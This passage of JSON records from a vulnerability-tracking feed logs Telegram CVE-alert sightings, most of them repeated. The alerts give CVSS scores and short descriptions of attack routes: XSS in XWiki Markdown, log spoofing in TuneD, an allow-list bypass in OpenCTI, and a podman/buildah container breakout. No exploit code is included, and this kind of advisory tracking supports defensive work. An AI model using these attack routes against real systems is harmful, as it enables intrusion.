https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "69e15382-e248-4a38-a4e5-19fa2076a76b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9098", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "c84d876c-da89-48df-9205-47fa062e1893", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8G2J-RHFH-HQ3R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14127", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46558\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: XWiki Contrib's Syntax Markdown allows importing Markdown content into wiki pages and creating wiki content in Markdown. In versions starting from 8.2 to before 8.9, the Markdown syntax is vulnerable to cross-site scripting (XSS) through HTML. In particular, using Markdown syntax, it's possible for any user to embed Javascript code that will then be executed on the browser of any other user visiting either the document or the comment that contains it. In the instance that this code is executed by a user with admins or programming rights, this issue compromises the confidentiality, integrity and availability of the whole XWiki installation. This issue has been patched in version 8.9.\n\ud83d\udccf Published: 2025-04-30T18:27:30.953Z\n\ud83d\udccf Modified: 2025-04-30T19:01:32.321Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki-contrib/syntax-markdown/security/advisories/GHSA-8g2j-rhfh-hq3r\n2. https://github.com/xwiki-contrib/syntax-markdown/commit/d136472d6e8a47981a0ede420a9096f88ffa5035\n3. https://jira.xwiki.org/browse/MARKDOWN-80", "creation_timestamp": "2025-04-30T19:13:38.000000Z"}, {"uuid": "7fe1161a-7535-462c-a9b2-29c86b7070f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3718", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "c83524de-bedf-40a1-8970-d8aa8745d619", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7174", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "e2bc067d-f928-48b3-b8f7-8fde08d29ec7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7941", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "8495e20c-40cc-41a7-bf5c-635a7cea37b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0195", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5266", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52337\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: A log spoofing flaw was found in the Tuned package due to improper sanitization of some API arguments. This flaw allows an attacker to pass a controlled sequence of characters; newlines can be inserted into the log. Instead of the 'evil' the attacker could mimic a valid TuneD log line and trick the administrator. The quotes '' are usually used in TuneD logs citing raw user input, so there will always be the ' character ending the spoofed input, and the administrator can easily overlook this. This logged string is later used in logging and in the output of utilities, for example, `tuned-adm get_instances` or other third-party programs that use Tuned's D-Bus interface for such operations.\n\ud83d\udccf Published: 2024-11-26T15:21:17.538Z\n\ud83d\udccf Modified: 2025-02-25T11:46:21.468Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10381\n2. https://access.redhat.com/errata/RHSA-2024:10384\n3. https://access.redhat.com/errata/RHSA-2024:11161\n4. https://access.redhat.com/errata/RHSA-2025:0195\n5. https://access.redhat.com/errata/RHSA-2025:0327\n6. https://access.redhat.com/errata/RHSA-2025:0368\n7. https://access.redhat.com/errata/RHSA-2025:0879\n8. https://access.redhat.com/errata/RHSA-2025:0880\n9. https://access.redhat.com/errata/RHSA-2025:0881\n10. https://access.redhat.com/errata/RHSA-2025:1785\n11. https://access.redhat.com/errata/RHSA-2025:1802\n12. https://access.redhat.com/security/cve/CVE-2024-52337\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2324541\n14. https://security.opensuse.org/2024/11/26/tuned-instance-create.html\n15. https://www.openwall.com/lists/oss-security/2024/11/28/1", "creation_timestamp": "2025-02-25T12:24:13.000000Z"}, {"uuid": "b4cc3de6-f58f-49bd-9ba8-2f51afe9a7f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6122", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "0b29f97b-792e-4dac-bddd-b3ad26577151", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0881", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5266", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52337\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: A log spoofing flaw was found in the Tuned package due to improper sanitization of some API arguments. This flaw allows an attacker to pass a controlled sequence of characters; newlines can be inserted into the log. Instead of the 'evil' the attacker could mimic a valid TuneD log line and trick the administrator. The quotes '' are usually used in TuneD logs citing raw user input, so there will always be the ' character ending the spoofed input, and the administrator can easily overlook this. This logged string is later used in logging and in the output of utilities, for example, `tuned-adm get_instances` or other third-party programs that use Tuned's D-Bus interface for such operations.\n\ud83d\udccf Published: 2024-11-26T15:21:17.538Z\n\ud83d\udccf Modified: 2025-02-25T11:46:21.468Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10381\n2. https://access.redhat.com/errata/RHSA-2024:10384\n3. https://access.redhat.com/errata/RHSA-2024:11161\n4. https://access.redhat.com/errata/RHSA-2025:0195\n5. https://access.redhat.com/errata/RHSA-2025:0327\n6. https://access.redhat.com/errata/RHSA-2025:0368\n7. https://access.redhat.com/errata/RHSA-2025:0879\n8. https://access.redhat.com/errata/RHSA-2025:0880\n9. https://access.redhat.com/errata/RHSA-2025:0881\n10. https://access.redhat.com/errata/RHSA-2025:1785\n11. https://access.redhat.com/errata/RHSA-2025:1802\n12. https://access.redhat.com/security/cve/CVE-2024-52337\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2324541\n14. https://security.opensuse.org/2024/11/26/tuned-instance-create.html\n15. https://www.openwall.com/lists/oss-security/2024/11/28/1", "creation_timestamp": "2025-02-25T12:24:13.000000Z"}, {"uuid": "de6ba798-9034-49b8-954a-c927f996ae88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1802", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5266", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52337\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: A log spoofing flaw was found in the Tuned package due to improper sanitization of some API arguments. This flaw allows an attacker to pass a controlled sequence of characters; newlines can be inserted into the log. Instead of the 'evil' the attacker could mimic a valid TuneD log line and trick the administrator. The quotes '' are usually used in TuneD logs citing raw user input, so there will always be the ' character ending the spoofed input, and the administrator can easily overlook this. This logged string is later used in logging and in the output of utilities, for example, `tuned-adm get_instances` or other third-party programs that use Tuned's D-Bus interface for such operations.\n\ud83d\udccf Published: 2024-11-26T15:21:17.538Z\n\ud83d\udccf Modified: 2025-02-25T11:46:21.468Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10381\n2. https://access.redhat.com/errata/RHSA-2024:10384\n3. https://access.redhat.com/errata/RHSA-2024:11161\n4. https://access.redhat.com/errata/RHSA-2025:0195\n5. https://access.redhat.com/errata/RHSA-2025:0327\n6. https://access.redhat.com/errata/RHSA-2025:0368\n7. https://access.redhat.com/errata/RHSA-2025:0879\n8. https://access.redhat.com/errata/RHSA-2025:0880\n9. https://access.redhat.com/errata/RHSA-2025:0881\n10. https://access.redhat.com/errata/RHSA-2025:1785\n11. https://access.redhat.com/errata/RHSA-2025:1802\n12. https://access.redhat.com/security/cve/CVE-2024-52337\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2324541\n14. https://security.opensuse.org/2024/11/26/tuned-instance-create.html\n15. https://www.openwall.com/lists/oss-security/2024/11/28/1", "creation_timestamp": "2025-02-25T12:24:13.000000Z"}, {"uuid": "6b8d30d3-13ab-4240-b9fb-0ad27af71358", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8262-PW2Q-5QC3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14125", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24887\n\ud83d\udd25 CVSS Score: 6.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)\n\ud83d\udd39 Description: OpenCTI is an open-source cyber threat intelligence platform. In versions starting from 6.4.8 to before 6.4.10, the allow/deny lists can be bypassed, allowing a user to change attributes that are intended to be unmodifiable by the user. It is possible to toggle the `external` flag on/off and change the own token value for a user. It is also possible to edit attributes that are not in the allow list, such as `otp_qr` and `otp_activated`. If external users exist in the OpenCTI setup and the information about these users identities is sensitive, the above vulnerabilities can be used to enumerate existing user accounts as a standard low privileged user. This issue has been patched in version 6.4.10.\n\ud83d\udccf Published: 2025-04-30T18:27:24.530Z\n\ud83d\udccf Modified: 2025-04-30T19:06:07.538Z\n\ud83d\udd17 References:\n1. https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-8262-pw2q-5qc3", "creation_timestamp": "2025-04-30T19:13:32.000000Z"}, {"uuid": "2e38c706-e886-4c4c-9c0a-8725c70d69d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0879", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5266", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52337\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: A log spoofing flaw was found in the Tuned package due to improper sanitization of some API arguments. This flaw allows an attacker to pass a controlled sequence of characters; newlines can be inserted into the log. Instead of the 'evil' the attacker could mimic a valid TuneD log line and trick the administrator. The quotes '' are usually used in TuneD logs citing raw user input, so there will always be the ' character ending the spoofed input, and the administrator can easily overlook this. This logged string is later used in logging and in the output of utilities, for example, `tuned-adm get_instances` or other third-party programs that use Tuned's D-Bus interface for such operations.\n\ud83d\udccf Published: 2024-11-26T15:21:17.538Z\n\ud83d\udccf Modified: 2025-02-25T11:46:21.468Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10381\n2. https://access.redhat.com/errata/RHSA-2024:10384\n3. https://access.redhat.com/errata/RHSA-2024:11161\n4. https://access.redhat.com/errata/RHSA-2025:0195\n5. https://access.redhat.com/errata/RHSA-2025:0327\n6. https://access.redhat.com/errata/RHSA-2025:0368\n7. https://access.redhat.com/errata/RHSA-2025:0879\n8. https://access.redhat.com/errata/RHSA-2025:0880\n9. https://access.redhat.com/errata/RHSA-2025:0881\n10. https://access.redhat.com/errata/RHSA-2025:1785\n11. https://access.redhat.com/errata/RHSA-2025:1802\n12. https://access.redhat.com/security/cve/CVE-2024-52337\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2324541\n14. https://security.opensuse.org/2024/11/26/tuned-instance-create.html\n15. https://www.openwall.com/lists/oss-security/2024/11/28/1", "creation_timestamp": "2025-02-25T12:24:13.000000Z"}, {"uuid": "e0ab43db-2aeb-40fc-ad8a-eb8c46bbdf03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1295", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5635", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-02-27T00:54:39.333Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/security/cve/CVE-2024-11218\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-02-27T01:26:02.000000Z"}, {"uuid": "6447993f-8d72-4b54-b482-159d81a3366d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0923", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5635", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-02-27T00:54:39.333Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/security/cve/CVE-2024-11218\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-02-27T01:26:02.000000Z"}, {"uuid": "0bb4846f-0e72-4ad3-899b-ab7272b4a8ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0922", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5635", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-02-27T00:54:39.333Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. 